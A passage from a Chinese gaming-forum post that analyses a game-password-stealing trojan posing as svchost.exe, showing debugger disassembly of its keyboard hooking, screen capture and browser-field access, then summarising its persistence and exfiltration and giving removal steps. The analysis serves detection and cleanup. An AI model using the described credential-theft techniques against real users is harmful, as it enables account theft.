  261. 00403695   .  0BC0          or eax,eax
  262. 00403697   .  74 02         je short svchost.0040369B
  263. 00403699   .  FFE0          jmp eax
  264. 0040369B   >  68 78364000   push svchost.00403678                    ;  user32
  265. 004036A0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  266. 004036A5   .  FFD0          call eax
  267. 004036A7   .  FFE0          jmp eax                                  ;  MapVirtualKeyA

  269. 7340CEF2 |. 56 push esi ; /lParam
  270. 7340CEF3 |. FF75 0C push [arg.2] ; |wParam
  271. 7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
  272. 7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
  273. 7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx

  275. 004033B0   [        DISCUZ_CODE_4        ]nbsp; A1 80574100   mov eax,dword ptr ds:[415780]
  276. 004033B5   .  0BC0          or eax,eax
  277. 004033B7   .  74 02         je short svchost.004033BB
  278. 004033B9   .  FFE0          jmp eax
  279. 004033BB   >  68 98334000   push svchost.00403398                    ;  user32
  280. 004033C0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  281. 004033C5   .  FFD0          call eax
  282. 004033C7   .  FFE0          jmp eax                                  ;  GetDC


  285. 733A1BAF . 57 push edi ; /hDC => NULL
  286. 733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
  287. 733A1BB6 . 3BC7 cmp eax,edi
  288. 733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
  289. 733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
  290. 733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
  291. 733A1BC6 . 50 push eax ; |hDC
  292. 733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject

  294. 004059AB   > \68 88594000   push svchost.00405988                    ;  GDIPlus
  295. 004059B0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  296. 004059B5   .  FFD0          call eax
  297. 004059B7   .  FFE0          jmp eax                                  ;  GdipSaveImageToFile


  300. 0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
  301. 0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
  302. 0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
  303. 0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
  304. 0040D52F . 6A 00 push 0
  305. 0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
  306. 0040D534 . 52 push edx


  309. 00411B52 . 68 305C4000 push svchost.00405C30 ; Write
  310. 00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
  311. 00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
  312. 00411B5D . 53 push ebx
  313. 00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
  314. 00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
  315. 00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
  316. 00411B69 . 51 push ecx
  317. 00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
  318. 00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
  319. 00411B70 . 52 push edx
  320. 00411B71 . FFD7 call edi
  321. 00411B73 . 83C4 10 add esp,10
  322. 00411B76 . 50 push eax
  323. 00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
  324. 00411B7D . 50 push eax
  325. 00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
  326. 00411B84 . 83C4 1C add esp,1C
  327. 00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
  328. 00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  329. 00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  330. 00411B93 . 53 push ebx
  331. 00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
  332. 00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  333. 00411B9C . 50 push eax
  334. 00411B9D . 51 push ecx
  335. 00411B9E . FFD7 call edi
  336. 00411BA0 . 83C4 10 add esp,10
  337. 00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
  338. 00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
  339. 00411BAB . 52 push edx
  340. 00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
  341. 00411BB2 . 50 push eax
  342. 00411BB3 . E8 E8030000 call svchost.00411FA0
  343. 00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  344. 00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
  345. 00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  346. 00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  347. 00411BC7 . 53 push ebx
  348. 00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
  349. 00411BCD . 53 push ebx
  350. 00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
  351. 00411BD3 . 53 push ebx
  352. 00411BD4 . 68 805C4000 push svchost.00405C80 ; All
  353. 00411BD9 . 53 push ebx
  354. 00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
複製代碼
總結:
1.獲取制定目錄創建目錄,自複制,然後運行。

2.創建bat實現計劃任務指定時間運行木馬。

3.結束自身。

4.複製後的程序通過查找窗口,枚舉進程方法獲取遊戲窗口截取密碼。

5.至於密保就是利用截屏,然後發送到製定地址。

由於本人能力的有限,錯誤及遺漏在所難免! 或許原理並沒有這麼簡單,還請其他高手作出指點. 萬分感謝!


查殺方法:

首先用XueTr.exe 結束svchost.exe結束進程(不結束怎麼刪除哈),然後

到這個目錄刪除C:\WINDOWS\system32\Pusmint下所有的文件。

然後運行XueTr.exe切換到啟動項就明朗了,直接delete *.JOB的項目。



大家正在看啥

收藏收藏 分享文章到FB上分享
脱壳文章
回覆 使用道具 檢舉
複製專屬你的推廣連結:發至FB與各論壇宣傳:累積點數換GP商品 & 藍鑽
每五點閱率就可以兌換藍鑽積分或遊戲點卡 夢遊推廣文章換GP商品
進階模式
B Color Image Link Quote Code Smilies
你需要登入後才可以回覆 登入 | 加入會員

本版積分規則

返回清單 發表主題 通知這文章過時或找檔

Copyright (C) 2010-2020 夢遊電玩論壇

廣告合作:請直接聯繫我們,並附上您預刊登位置的預算。  

快速回覆 返回頂端 返回清單